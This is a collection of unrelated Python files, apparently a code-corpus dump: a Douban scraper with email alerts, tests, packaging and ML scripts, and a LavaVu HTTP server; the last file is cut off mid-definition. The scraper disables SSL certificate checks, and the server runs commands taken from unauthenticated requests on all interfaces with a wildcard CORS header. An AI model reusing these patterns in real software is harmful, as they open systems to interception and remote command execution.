import getpass
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr
import urllib.request, urllib.parse, urllib.error
import ssl
import json
import time
import re
import os
import sys
# E-mail helper for notifications
def Email(sender, password, recipient, emailsub, emailmsg, smtpserver, smtpport):
try:
msg = MIMEText(emailmsg, 'plain', 'utf-8')
msg['From'] = formataddr(['Catfood Reminder', sender])
msg['To'] = formataddr([recipient, recipient])
msg['Subject'] = emailsub
server = smtplib.SMTP_SSL(smtpserver, smtpport)
server.login(sender, password)
server.sendmail(sender,[recipient,],msg.as_string())
server.quit()
print('Succeeded in sending e-mail')
return True
except Exception:
print('Failed to send e-mail')
return False
def MacOsNotification(ostitle, osmsg):
if sys.platform == 'darwin':
os.system('osascript -e \'display notification "' + osmsg + '" sound name "default" with title "' + ostitle + '"\'')
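# Usage sketch (illustrative only): MacOsNotification('Catfood Reminder', '3 new message(s)')
# runs the AppleScript command
#   osascript -e 'display notification "3 new message(s)" sound name "default" with title "Catfood Reminder"'
# on macOS and does nothing on other platforms.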
def GetDoubanTopic(keywords):
# Load saved topic data
try:
with open('record.json', 'r') as record_file:
record = json.load(record_file)
record_topics = record['topics']
lasttime = record['time']
record_file.close()
except:
record = dict()
record_topics = dict()
lasttime = "2020-01-01 00:00:00"
# Write new topic data
with open('record.json', 'w') as record_file:
# Request up to 1,000 topics from Douban (10 pages of 100)
info = []
for i in range(0, 10):
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
# Request data in JSON format
count = 100
start = i * count
url = 'https://api.douban.com/v2/group/656297/topics?start=' + str(start) + '&count=' + str(count)
header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.56'}
req = urllib.request.Request(url = url, headers = header)
nowtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
try:
data = json.loads(urllib.request.urlopen(req, context = ctx).read())
except:
continue
# Filter topics of interest
for number in range(0, count):
topic = data['topics'][number]
content = topic['title'] + topic ['content']
if topic['updated'] <= lasttime:
break
if re.search(keywords, content, re.I|re.M|re.S) != None:
if topic['id'] not in record_topics.keys():
info.append(topic['updated'] + '\r\n' + topic['title'] + '\r\n' + topic['share_url'] + '\r\n' + '-' * 50)
print(topic['updated'] + '\n' + topic['title'] + '\n' + topic['share_url'] + '\n' + '-' * 50)
record_topics[topic['id']] = {'updated':topic['updated'], 'title':topic['title'], 'link':topic['share_url']}
if number < (count - 1):
break
record['time'] = nowtime
record['topics'] = record_topics
json.dump(record, record_file, ensure_ascii = False)
if len(info) == 0:
print('No new message ' + nowtime)
else:
message = str(len(info)) + ' new message(s) ' + nowtime
print(message)
MacOsNotification('Catfood Reminder', message)
Email(SenderAddress, Password, RecipientAddress, message, "\r\n".join(info), SMTPServer, SMTPPort)
record_file.close()
return
#Setup e-mail
while True:
# Log in to e-mail
SenderAddress = input('Please input the sender\'s e-mail address: ')
Password = getpass.getpass('Please input the sender\'s e-mail password: ')
SMTPServer = input('Please input the sender\'s e-mail SMTP server address: ')
SMTPPort = int(input('Please input the sender\'s e-mail SMTP port: '))
RecipientAddress = input('Please input the recipient\'s e-mail address: ')
#Test E-mail
testemail = Email(SenderAddress, Password, RecipientAddress, 'TEST MESSAGE', 'THIS IS TEST TEXT', SMTPServer, SMTPPort)
if testemail:
print('Valid e-mail settings, start searching...')
break
else:
print('Invalid e-mail settings, please retry')
# Search for new topics every 10 minutes
while True:
GetDoubanTopic(r'(开车).*?(go)') # change to your target keywords
print('Next search will start in 10 min')
time.sleep(600)
| python |
import unittest
from buscasrc.core.analyzer import Analyzer
class TestAnalyzer(unittest.TestCase):
def setUp(self):
self.analyzer = Analyzer()
def test_prepare_text(self):
text = "Conan, the barbarian is a great HQ. Conan, #MustRead!"
self.assertListEqual(self.analyzer.prepare_text(text), [
("conan", [0, 4]),
("barbarian", [1]),
("great", [2]),
("hq", [3]),
("mustread", [5])])
def test_execute_before_filters(self):
text = "Hello! Can i help you? Some things we have: rice, beans," \
" chicken, ..."
result = self.analyzer._execute_before_filters(text)
self.assertEqual(result,
"Hello Can i help you Some things we have rice"
" beans chicken ")
def test_execute_after_filters(self):
tokens_list = ["After", "all", "we", "will", "resist", "-", "JOHN"]
result = self.analyzer._execute_after_filters(tokens_list)
self.assertEqual(result, ["will", "resist", "john"])
def test_generate_tokens_with_positions(self):
tokens_list = ["john", "will", "resist", "john"]
result = self.analyzer._generate_tokens_with_positions(tokens_list)
self.assertEqual(result, [
("john", [0, 3]),
("will", [1]),
("resist", [2])])
def test_get_token_positions(self):
token = "conan"
tokens_list = ["conan", "barbarian", "axe", "conan", "sword"]
self.assertEqual(
self.analyzer._get_token_positions(token, tokens_list), [0, 3])
| python |
import yaml
from functools import lru_cache
from flask import current_app as app
from atst.utils import getattr_path
class LocalizationInvalidKeyError(Exception):
def __init__(self, key, variables):
self.key = key
self.variables = variables
def __str__(self):
return "Requested {key} with variables {variables} but an error occurred".format(
key=self.key, variables=self.variables
)
@lru_cache(maxsize=None)
def _translations_file():
file_name = "translations.yaml"
if app:
file_name = app.config.get("DEFAULT_TRANSLATIONS_FILE", file_name)
f = open(file_name)
return yaml.safe_load(f)
def all_keys():
translations = _translations_file()
keys = []
def _recursive_key_lookup(chain):
results = getattr_path(translations, chain)
if isinstance(results, str):
keys.append(chain)
else:
[_recursive_key_lookup(".".join([chain, result])) for result in results]
[_recursive_key_lookup(key) for key in translations]
return keys
def translate(key, variables=None):
translations = _translations_file()
value = getattr_path(translations, key)
if variables is None:
variables = {}
if value is None:
raise LocalizationInvalidKeyError(key, variables)
return value.format(**variables).replace("\n", "")
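# Usage sketch (hypothetical translations.yaml content), e.g. given:
#   login:
#     title: "Hello, {name}!"
# translate("login.title", {"name": "Ada"}) would return "Hello, Ada!";
# keys are dotted paths resolved by getattr_path, and newlines are stripped from the result.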
| python |
from .validate import Validate
__all__ = ["Validate"]
| python |
"""Application tests."""
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import inselect
REQUIREMENTS = [
# TODO How to specify OpenCV? 'cv2>=3.1.0',
'numpy>=1.11.1,<1.12',
'Pillow>=3.4.2,<3.5',
'python-dateutil>=2.6.0,<2.7',
'pytz>=2016.7',
'PyYAML>=3.12,<3.13',
'schematics>=1.1.1,<1.2',
'scikit-learn>=0.18.1,<0.19',
'scipy>=0.18.1,<0.19',
'unicodecsv>=0.14.1,<0.15',
]
SCRIPTS = ('export_metadata', 'ingest', 'read_barcodes', 'save_crops', 'segment')
setup_data = {
'name': 'inselect',
'version': inselect.__version__,
'author': (u'Lawrence Hudson, Alice Heaton, Pieter Holtzhausen, '
u'Stéfan van der Walt'),
'author_email': '[email protected]',
'maintainer': 'Lawrence Hudson',
'maintainer_email': '[email protected]',
'url': 'https://github.com/NaturalHistoryMuseum/inselect/',
'license': 'Modified BSD',
'description': inselect.__doc__,
'long_description': inselect.__doc__,
'packages': [
'inselect', 'inselect.gui', 'inselect.gui.plugins',
'inselect.gui.views', 'inselect.gui.views.boxes', 'inselect.lib',
'inselect.lib.templates', 'inselect.scripts',
],
'include_package_data': True,
'test_suite': 'inselect.tests',
'scripts': ['inselect/scripts/{0}.py'.format(script) for script in SCRIPTS],
'install_requires': REQUIREMENTS,
'extras_require': {
'gui': [
'ExifRead>=2.1.2', 'humanize>=0.5.1', 'psutil>=5.0.0',
'PyQt5>=5.6.0'
],
'barcodes': ['gouda>=0.1.13', 'pylibdmtx>=0.1.6', 'pyzbar>=0.1.3'],
'windows': ['pywin32>=220'],
'development': ['coveralls>=1.1', 'mock>=2.0.0', 'nose>=1.3.7'],
},
'entry_points': {
'gui_scripts':
['inselect = inselect.gui.app:main'],
'console_scripts':
['{0} = inselect.scripts.{0}:main'.format(script) for script in SCRIPTS],
},
'classifiers': [
'Development Status :: 4 - Beta',
'Topic :: Utilities',
'Topic :: Scientific/Engineering :: Bio-Informatics',
'Programming Language :: Python :: 3.5',
],
}
def setuptools_setup():
"""setuptools setup"""
from setuptools import setup
setup(**setup_data)
def _qt_files(site_packages):
"""Returns a list of tuples (src, dest) of Qt dependencies to be installed.
Elements are instances of Path.
site_packages should be an instance of Path to the site-packages directory.
IF we leave cx_Freeze to do its thing then the entirety of PyQt5, Qt5 and
uic are included in the installer. The only way to avoid horrible bloat is
to hand-tune which files we include.
This whole system is fucked beyond belief.
"""
from pathlib import Path
return [
# Qt DLLs
(
site_packages.joinpath('PyQt5/Qt/bin').joinpath(dep),
dep
)
for dep in ('Qt5Core.dll', 'Qt5Gui.dll', 'Qt5Widgets.dll')
] + [
# Qt plugins
(
site_packages.joinpath('PyQt5/Qt/plugins/platforms').joinpath(dep),
Path('platforms').joinpath(dep)
)
for dep in ('qwindows.dll',)
] + [
# PyQt extension modules
(
site_packages.joinpath('PyQt5').joinpath(dep),
Path('PyQt5').joinpath(dep)
)
for dep in ('__init__.py', 'Qt.pyd', 'QtCore.pyd', 'QtGui.pyd', 'QtWidgets.pyd')
]
def cx_setup():
"""cx_Freeze setup. Used for building Windows installers"""
import scipy
from pathlib import Path
from distutils.sysconfig import get_python_lib
from cx_Freeze import setup, Executable
from pylibdmtx import pylibdmtx
from pyzbar import pyzbar
# Useful paths
environment_root = Path(sys.executable).parent
site_packages = Path(get_python_lib())
project_root = Path(__file__).parent
# Files as tuples (source, dest)
include_files = [
# Evil, evil, evil
# cx_Freeze breaks pywintypes and pythoncom on Python 3.5
# https://bitbucket.org/anthony_tuininga/cx_freeze/issues/194/error-with-frozen-executable-using-35-and
(site_packages.joinpath('win32/lib/pywintypes.py'), 'pywintypes.py'),
(site_packages.joinpath('pythoncom.py'), 'pythoncom.py'),
# Binary dependencies that are not detected
(environment_root.joinpath('Library/bin/mkl_core.dll'), 'mkl_core.dll'),
(environment_root.joinpath('Library/bin/mkl_intel_thread.dll'), 'mkl_intel_thread.dll'),
(environment_root.joinpath('Library/bin/libiomp5md.dll'), 'libiomp5md.dll'),
# Stylesheet
(project_root.joinpath('inselect/gui/inselect.qss'), 'inselect.qss'),
] + [
# DLLs that are not detected because they are loaded by ctypes
(dep._name, Path(dep._name).name)
for dep in pylibdmtx.EXTERNAL_DEPENDENCIES + pyzbar.EXTERNAL_DEPENDENCIES
] + _qt_files(site_packages)
# Convert instances of Path to strs
include_files = [(str(source), str(dest)) for source, dest in include_files]
# Directories as strings
include_files += [
# Fixes scipy freeze
# http://stackoverflow.com/a/32822431/1773758
str(Path(scipy.__file__).parent),
]
# Packages to exclude.
exclude_packages = [
str(p.relative_to(site_packages)).replace('\\', '.') for p in
site_packages.rglob('*/tests')
]
setup(
name=setup_data['name'],
version=setup_data['version'],
options={
'build_exe': {
'packages':
setup_data.get('packages', []) + [
'urllib', 'sklearn.neighbors', 'win32com.gen_py',
'win32timezone',
],
'excludes': [
# '_bz2', # Required by sklearn
'_decimal', '_elementtree', '_hashlib', '_lzma',
'_ssl', 'curses',
'distutils', 'email', 'http', 'lib2to3', 'mock', 'nose',
'PyQt5',
# 'pydoc', # Required by sklearn
'tcl', 'Tkinter', 'ttk', 'Tkconstants',
# 'unittest', # Required by numpy.core.multiarray
'win32com.HTML', 'win32com.test', 'win32evtlog', 'win32pdh',
'win32trace', 'win32ui', 'win32wnet',
'xml', 'xmlrpc',
'inselect.tests',
] + exclude_packages,
'includes': [
],
'include_files': include_files,
'include_msvcr': True,
'optimize': 2,
},
'bdist_msi': {
'upgrade_code': '{fe2ed61d-cd5e-45bb-9d16-146f725e522f}'
}
},
executables=[
Executable(
script='inselect/scripts/inselect.py',
targetName='inselect.exe',
icon='icons/inselect.ico',
base='Win32GUI',
shortcutName='Inselect', # See http://stackoverflow.com/a/15736406
shortcutDir='ProgramMenuFolder'
)
] + [
Executable(
script='inselect/scripts/{0}.py'.format(script),
targetName='{0}.exe'.format(script),
icon='icons/inselect.ico',
base='Console'
)
for script in SCRIPTS
],
)
if (3, 5) <= sys.version_info:
if 'bdist_msi' in sys.argv:
cx_setup()
else:
setuptools_setup()
else:
sys.exit('Only Python >= 3.5 is supported')
| python |
# get camera list
import logging
from datetime import datetime
from typing import Any
from typing import List
import requests
from protect_archiver.dataclasses import Camera
def get_camera_list(session: Any, connected: bool = True) -> List[Camera]:
cameras_uri = f"{session.authority}{session.base_path}/cameras"
response = requests.get(
cameras_uri,
cookies={"TOKEN": session.get_api_token()},
verify=session.verify_ssl,
)
if response.status_code != 200:
print(f"Error while loading camera list: {response.status_code}")
return []
logging.info(f"Successfully retrieved data from {cameras_uri}")
cameras = response.json()
camera_list = []
for camera in cameras:
cameraData = Camera(id=camera["id"], name=camera["name"], recording_start=0)
if camera["stats"]["video"]["recordingStart"]:
cameraData.recording_start = datetime.utcfromtimestamp(
camera["stats"]["video"]["recordingStart"] / 1000
)
camera_list.append(cameraData)
logging.info(
"Cameras found:\n{}".format(
"\n".join(f"- {camera.name} ({camera.id})" for camera in camera_list)
)
)
return camera_list
| python |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 26 15:15:55 2018
@author: Madhur Kashyap 2016EEZ8350
"""
import os
import sys
import logging
import numpy as np
from functools import partial
from keras.optimizers import Adadelta
from sklearn.metrics import confusion_matrix
prog = os.path.basename(__file__)
codedir = os.path.join(os.path.dirname(__file__),"..","code")
sys.path.append(codedir)
from Utils import *
from PlotUtils import *
from SpeechCorpus import Timit
from AcousticModels import *
from TrainUtils import train_model,weighted_categorical_crossentropy
from AcousticDataGenerator import AcousticDataGenerator
#logfile = prog+'.log'
#rootlog = initlog(logfile,level=logging.DEBUG);
#rootlog.info('Starting new session');
if len(sys.argv)>1:
corpus = Timit(root=sys.argv[1]);
else:
corpus = Timit(root='C:/Users/nxa17016/ML/pyml/RNN/assignment3/dataset')
corpus.split_validation();
#rootlog.info(corpus.report_statistics(folder='report/images'));
adg = AcousticDataGenerator(corpus=corpus,mbatch_size=32,
mfcc_win=0.0125,mfcc_step=0.005,
ce_encoding_mode='best',
mode='phoneme', model_silence=True);
adg.fit_train(n_samples=1000);
model = bidi_lstm(input_dim=adg.feature_dim,units=20,output_dim=adg.n_classes,
batchnorm=True,after_dropout=0.0);
train_model(model,adg.train_generator(),adg.valid_generator(),'bidi_gru_20',
epochs=1,steps_per_epoch=adg.nb_train-100,validation_steps=adg.nb_valid-10,
verbose=1,save_period=0,optimizer=Adadelta(),report_stats=True,
class_names=list(adg.outmap[0].keys())); | python |
from connect4 import Connect4Board
from connect4 import GameState
from connect4 import Player
def test_win_condition():
# check vertical
for row in range(6-3):
for col in range(7):
game = Connect4Board()
for i in range(row, row+4):
game.board[i][col] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed vertical win condition for player 1", game
game = Connect4Board()
for i in range(row, row+4):
game.board[i][col] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed vertical win condition for player 2", game
# check horizontal
for row in range(6):
for col in range(7-3):
game = Connect4Board()
for i in range(col, col+4):
game.board[row][i] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed horizontal win condition for player 1", game
game = Connect4Board()
for i in range(col, col+4):
game.board[row][i] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed horizontal win condition for player 2", game
# check diagonal
for row in range(6-3):
for col in range(7-3):
game = Connect4Board()
for i in range(4):
game.board[row+i][col+i] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed diagonal / win condition for player 1", game
game = Connect4Board()
for i in range(4):
game.board[row+i][col+i] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed diagonal / win condition for player 2", game
for row in range(6-3):
for col in range(3,7):
game = Connect4Board()
for i in range(4):
game.board[row+i][col-i] = Player.PLAYER_1
if not game.check_win(Player.PLAYER_1):
return False, "Failed diagonal \\ win condition for player 1", game
game = Connect4Board()
for i in range(4):
game.board[row+i][col-i] = Player.PLAYER_2
if not game.check_win(Player.PLAYER_2):
return False, "Failed diagonal \\ win condition for player 2", game
return True, None, None
if __name__ == "__main__":
all_tests_pass = True
test_win_condition_pass, error, game = test_win_condition()
if not test_win_condition_pass:
print("Failed win condition test! Error:", error)
game.print_board()
all_tests_pass = False
if all_tests_pass:
print("All tests pass!")
| python |
import urllib
import os
import threading
import time
import errno
from functools import partial
import weakref
import base64
import json
import socket
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler, HTTPServer
from urllib.parse import unquote
from urllib.parse import urlparse
from urllib.parse import parse_qs
"""
HTTP Server interface
"""
class LVRequestHandler(SimpleHTTPRequestHandler, object):
def __init__(self, viewer_weakref, *args, **kwargs):
#Used with partial() to provide the viewer object
try:
self._lv = viewer_weakref
super(LVRequestHandler, self).__init__(*args, **kwargs)
except (IOError) as e:
# Ignore benign IO errors on the server; re-raise anything unexpected
if e.errno == errno.EPIPE:
# EPIPE error, ignore
pass
elif e.errno == errno.EPROTOTYPE:
# MacOS "Protocol wrong type for socket" error, ignore
pass
else:
raise e
def serveResponse(self, data, datatype):
try:
#Serve provided data, with error check for SIGPIPE (broken connection)
self.send_response(200)
self.send_header('Content-type', datatype)
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('x-colab-notebook-cache-control', 'no-cache') #Colab: disable offline access cache
self.end_headers()
if data:
self.wfile.write(data)
#This specific error sometimes occurs on windows, ConnectionError is the base class and covers a few more
#except (IOError,ConnectionAbortedError) as e:
# if isinstance(e,ConnectionAbortedError):
except (IOError,ConnectionError) as e:
if isinstance(e,ConnectionError):
pass
elif e.errno == errno.EPIPE:
# EPIPE error, ignore
pass
else:
raise e
def do_HEAD(self):
self.serveResponse(None, 'text/html')
def do_POST(self):
#Always interpret post data as commands
#(can perform other actions too based on self.path later if we want)
data_string = self.rfile.read(int(self.headers['Content-Length']))
self.serveResponse(b'', 'text/plain')
# Decode the POST body (bytes) and URL-unquote it
cmds = unquote(str(data_string, 'utf-8'))
#Run viewer commands
self._execute(cmds)
def do_GET(self):
lv = self._get_viewer()
parsed = urlparse(self.path)
query = parse_qs(parsed.query)
def img_response():
resp = None
if 'width' in query and 'height' in query:
resp = lv.jpeg(resolution=(int(query['width'][0]), int(query['height'][0])))
elif 'width' in query:
resp = lv.jpeg(resolution=(int(query['width'][0]), 0))
else:
resp = lv.jpeg()
#Ensure the response is valid before serving
if resp is not None:
self.serveResponse(resp, 'image/jpeg')
if self.path.find('image') > 0:
img_response()
elif self.path.find('command=') > 0:
pos1 = self.path.find('=')
pos2 = self.path.find('?')
if pos2 < 0: pos2 = len(self.path)
cmds = unquote(self.path[pos1+1:pos2])
#Run viewer commands
self._execute(cmds)
#Serve image or just respond 200
if self.path.find('icommand=') > 0:
img_response()
else:
self.serveResponse(b'', 'text/plain')
elif self.path.find('getstate') > 0:
state = lv.app.getState()
self.serveResponse(bytearray(state, 'utf-8'), 'text/plain; charset=utf-8')
#self.serveResponse(bytearray(state, 'utf-8'), 'text/plain')
elif self.path.find('connect') > 0:
if 'url' in query:
#Save first valid connection URL on the viewer
url = query['url'][0]
if len(lv._url) == 0:
lv._url = url
uid = id(lv)
self.serveResponse(bytearray(str(uid), 'utf-8'), 'text/plain; charset=utf-8')
elif self.path.find('key=') > 0:
pos2 = self.path.find('&')
cmds = unquote(self.path[1:pos2])
lv.commands('key ' + cmds, True)
self.serveResponse(b'', 'text/plain')
elif self.path.find('mouse=') > 0:
pos2 = self.path.find('&')
cmds = unquote(self.path[1:pos2])
lv.commands('mouse ' + cmds, True)
self.serveResponse(b'', 'text/plain')
elif len(self.path) <= 1:
#Root requested, returns interactive view
w = lv.control.Window(align=None, wrapper=None)
code = lv.control.show(True, filename="")
self.serveResponse(bytearray(code, 'utf-8'), 'text/html; charset=utf-8')
else:
return SimpleHTTPRequestHandler.do_GET(self)
#Serve files from lavavu html dir
def translate_path(self, path):
lv = self._get_viewer()
if not os.path.exists(path):
#print(' - not found in cwd')
if path[0] == '/': path = path[1:]
path = os.path.join(lv.htmlpath, path)
if os.path.exists(path) and os.path.isfile(path):
#print(' - found in htmlpath')
return path
else:
#print(' - not found in htmlpath')
return SimpleHTTPRequestHandler.translate_path(self, self.path)
else:
return SimpleHTTPRequestHandler.translate_path(self, path)
#Stifle log output
def log_message(self, format, *args):
return
def _get_viewer(self):
#Get from weak reference, if deleted raise exception
lv = self._lv()
if not lv:
self._closing = True
raise(Exception("Viewer not found"))
return lv
def _execute(self, cmds):
lv = self._get_viewer()
if len(cmds) and cmds[0] == '_':
#base64 encoded commands or JSON state
cmds = str(base64.b64decode(cmds).decode('utf-8'))
#cmds = str(base64.b64decode(cmds), 'utf-8')
#Object to select can be provided in preceding angle brackets
selobj = None
if cmds[0] == '<':
pos = cmds.find('>')
selobj = lv.objects[cmds[1:pos]]
cmds = cmds[pos+1:]
#Execute commands via python API by preceding with '.'
done = False
if cmds[0] == '.':
attr = cmds.split()[0][1:]
pos = cmds.find(' ')
params = cmds[pos+1:]
if selobj:
#Call on Object
func = getattr(selobj, attr)
if func and callable(func):
func(params)
done = True
else:
#Call on Viewer
func = getattr(lv, attr)
if func and callable(func):
func(params)
done = True
elif cmds[0] == '$':
#Requests prefixed by '$' are sent
#from property collection controls
#format is $ID KEY VALUE
# - ID is the python id() of the properties object
# All properties collections are stored on their parent
# object using this id in the _collections dict
# - KEY is the property name key to set
# - VALUE is a json string containing the value to set
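# Illustrative example (hypothetical id): a request of the form
#   "$140244 opacity 0.5"
# looks up lv._collections["140244"], sets props["opacity"] = 0.5
# (the value is parsed with json.loads) and invokes its callback if one is defined and callable.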
S = cmds.split()
target = S[0][1:]
if target in lv._collections:
#Get from _collections by id (weakref)
props = lv._collections[target]()
props[S[1]] = json.loads(S[2])
#Check for callback - if provided, call with updated props
func = getattr(props, 'callback')
if func and callable(func):
func(props)
#Default, call via lv.commands() scripting API
if not done:
if selobj:
selobj.select()
lv.commands(cmds)
#Optional thread per request version:
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
pass
"""
HTTP Server manager class
"""
class Server(threading.Thread):
def __init__(self, viewer, port=None, ipv6=False, retries=100):
self.host = 0
if port is None:
port = 8080
self._closing = False
#Allow viewer to be garbage collected
self.viewer = weakref.ref(viewer)
self.port = port
self.retries = retries
self.maxretries = retries
self.ipv6 = ipv6
super(Server, self).__init__()
self.daemon = True #Place in background so will be closed on program exit
self._cv = threading.Condition()
def handle(self):
try:
httpd.handle_request()
except socket.error as e:
#print(str(e))
pass
def run(self):
httpd = None
HTTPServer.allow_reuse_address = False
try:
# We "partially apply" our first argument to get the viewer object into LVRequestHandler
handler = partial(LVRequestHandler, self.viewer)
if self.ipv6:
HTTPServer.address_family = socket.AF_INET6
hosts = ['::', 'localhost', '::1']
host = hosts[self.host]
#httpd = HTTPServer((host, self.port), handler)
httpd = ThreadingHTTPServer((host, self.port), handler)
else:
HTTPServer.address_family = socket.AF_INET
hosts = ['0.0.0.0', 'localhost', '127.0.0.1']
host = hosts[self.host]
#httpd = HTTPServer((host, self.port), handler)
httpd = ThreadingHTTPServer((host, self.port), handler)
#print("Server running on host %s port %s" % (host, self.port))
#Sync with starting thread here to ensure server thread has initialised before it continues
with self._cv:
self._cv.notifyAll()
# Handle requests
#print("Using port: ", self.port)
# A timeout is needed for server to check periodically if closing
httpd.timeout = 0.05 #50 millisecond timeout
while self.viewer() is not None and not self._closing:
httpd.handle_request()
except (Exception) as e:
self.retries -= 1
if self.retries < 1:
print("Failed to start server, max retries reached")
return
#Try another port
if e.errno == errno.EADDRINUSE: #98
self.port += 1
#Try again
self.run()
elif e.errno == errno.EAFNOSUPPORT: #97 : Address family not supported by protocol
#Try next host name/address
self.host += 1
if self.host > 2:
#Try again without ipv6?
if self.ipv6:
self.ipv6 = False
else:
self.ipv6 = True
self.host = 0
#Try again
self.run()
else:
print("Server start failed: ",e, e.errno, self.port)
def serve(viewer, port=None, ipv6=False, retries=100):
s = Server(viewer, port, ipv6, retries)
#Start the thread and wait for it to finish initialising
with s._cv:
s.start()
s._cv.wait()
return s
#Ignore SIGPIPE altogether (does not apply on windows)
import sys
if sys.platform != 'win32':
from signal import signal, SIGPIPE, SIG_IGN
signal(SIGPIPE, SIG_IGN)
"""
Main entry point - run server and open browser interface
"""
if __name__ == '__main__':
import lavavu
lv = lavavu.Viewer()
#lv.animate(1) #Required to show viewer window and handle mouse/keyboard events there too
lv.browser()
lv._thread.join() #Wait for server to quit
| python |
from twisted.trial import unittest
from twisted.internet import defer
from nodeset.core import config
from nodeset.common.twistedapi import NodeSetAppOptions
class ConfigurationTest(unittest.TestCase):
def setUp(self):
cfg = NodeSetAppOptions()
cfg.parseOptions(['-n', '--listen', 'localhost:4333',
'--dispatcher-url', 'pbu://localhost:5333/dispatcher'])
self.config = config.Configurator()
self.config._config = cfg
def testListenParam(self):
self.assertTrue(self.config['listen'] == 'localhost:4333')
def testDispatcherParam(self):
self.assertTrue(self.config['dispatcher-url'] == 'pbu://localhost:5333/dispatcher')
def testAnotherInstance(self):
c = config.Configurator()
self.assertTrue(c['listen'] == 'localhost:4333')
def testUpdate(self):
self.config['new_option'] = 'value'
self.assertTrue(self.config['new_option'] == 'value')
def testAnotherRoutine(self):
def anotherRoutine(d):
c = config.Configurator()
self.assertTrue(c['listen'] == 'host.name.com:4111')
self.config['listen'] = 'host.name.com:4111'
d = defer.Deferred()
d.addCallback(anotherRoutine)
d.callback(None)
def testPassingAsArgument(self):
def routine(conf):
c = config.Configurator()
self.assertTrue(c == conf)
d = defer.Deferred()
d.addCallback(routine)
d.callback(config.Configurator())
def tearDown(self):
del self.config | python |
acceptable_addrs = ["192.168.0.16"]
| python |
# Generated by Django 2.1.5 on 2019-01-27 00:11
from django.db import migrations, models
import django.db.models.deletion
import simplemde.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="Event",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"uuid",
models.UUIDField(default=uuid.uuid4, editable=False, unique=True),
),
("title", models.CharField(max_length=200)),
(
"description",
simplemde.fields.SimpleMDEField(
blank=True, max_length=2000, null=True
),
),
("invitee_capacity", models.PositiveIntegerField(default=0)),
("event_day", models.DateField()),
("initial_hour", models.TimeField()),
("end_hour", models.TimeField()),
("place_name", models.CharField(max_length=200)),
("open_street_map_url", models.URLField()),
],
),
migrations.CreateModel(
name="Invitee",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"uuid",
models.UUIDField(default=uuid.uuid4, editable=False, unique=True),
),
("enrolled_at", models.DateTimeField(auto_now_add=True)),
("cancelled", models.BooleanField(default=False)),
(
"event",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="events.Event"
),
),
],
),
]
| python |
from .operator_bot import main
main()
| python |
from episerver.vanir.configuration import Configuration
from azure.common.client_factory import get_client_from_json_dict
from azure.mgmt.resource import ResourceManagementClient
class AddEnvironmentCommand:
def __init__(self):
config = Configuration()
self.resource_client = get_client_from_json_dict(ResourceManagementClient, config.get_configuration())
def execute(self, args):
resource_group = self.resource_client.resource_groups.create_or_update(args.name, { "location": f"{args.location}" })
print(f"Provisioned resource group {resource_group.name} in the {resource_group.location} region") | python |
from tensorize import *
class InceptionResnetV1(Model):
def inference(self, inputs, output):
stem(inputs, output)
for x in xrange(4):
inceptionA()
reductionA()
for x in xrange(7):
inceptionB()
reductionB()
for x in xrange(3):
inceptionC()
AveragePooling()
Dropout(0.8)
CategoricalPredictionOutput(output)
def train(self, outputs):
CategoricalCrossEntropy()
CategoricalAccuracy(outputs)
GradientDescentOptimizer()
class InceptionResnetV2(Model):
def inference(self, inputs, output):
stem(inputs, output)
for x in xrange(4):
inceptionA()
reductionA()
for x in xrange(7):
inceptionB()
reductionB()
for x in xrange(3):
inceptionC()
AveragePooling()
Dropout(0.8)
CategoricalPredictionOutput(output)
def train(self, outputs):
CategoricalCrossEntropy()
CategoricalAccuracy(outputs)
GradientDescentOptimizer()
def stem(inputs, outputs):
BatchImageInput(inputs)
Convolution3x3(filters=32)
Convolution3x3(filters=32)
Convolution3x3(filters=64)
with ParallelBlock() as parallel:
with parallel:
MaxPooling2D()
with parallel:
Convolution3x3(filters=64)
FilterConcat()
with ParallelBlock() as parallel:
with parallel:
Convolution1x1(filters=64)
Convolution3x3(filters=96)
with parallel:
Convolution1x1(filters=64)
Convolution2D([7, 1], filters=64)
Convolution2D([1, 7], filters=64)
Convolution3x3(filters=96)
FilterConcat()
with ParallelBlock() as block:
with block:
MaxPooling2D()
with block:
Convolution3x3(filters=64)
FilterConcat()
def inceptionA():
with ParallelBlock() as parallel:
with parallel:
AveragePooling()
Convolution1x1(filters=96)
with parallel:
Convolution1x1(filters=96)
with parallel:
Convolution1x1(filters=64)
Convolution3x3(filters=96)
with parallel:
Convolution1x1(filters=64)
Convolution3x3(filters=96)
Convolution3x3(filters=96)
FilterConcat()
def inceptionB():
with ParallelBlock() as parallel:
with parallel:
AveragePooling()
Convolution1x1(filters=128)
with parallel:
Convolution1x1(filters=384)
with parallel:
Convolution1x1(filters=192)
Convolution2D([1, 7], filters=224)
Convolution2D([1, 7], filters=256)
with parallel:
Convolution1x1(filters=192)
Convolution2D([1, 7], filters=192)
Convolution2D([7, 1], filters=224)
Convolution2D([1, 7], filters=224)
Convolution2D([7, 1], filters=256)
FilterConcat()
def inceptionC():
with ParallelBlock() as parallel:
with parallel:
AveragePooling()
Convolution1x1(filters=256)
with parallel:
Convolution1x1(filters=256)
with parallel:
Convolution1x1(filters=384)
with ParallelBlock() as parallel_inner:
with parallel_inner:
